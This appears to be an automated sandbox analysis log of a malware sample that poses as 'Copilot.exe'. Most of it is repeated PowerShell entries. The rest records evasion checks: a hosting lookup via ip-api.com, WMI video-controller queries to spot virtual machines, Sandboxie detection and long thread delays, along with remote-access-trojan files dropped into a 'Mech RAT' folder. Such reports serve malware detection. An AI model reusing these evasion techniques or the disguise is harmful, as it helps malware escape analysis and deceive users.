                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: PixpFUv4G7.exe, 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Microsoft Copilot.exe.1.drBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeMemory allocated: 1ABB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 4A00000 memory commit | memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: 1660000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: 1110000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: 1AC30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: 1A910000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeMemory allocated: 1A7F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWindow / User API: threadDelayed 9590Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5975Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3773Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7699Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1891Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7700
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1900
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2598
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6951
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exeJump to dropped file
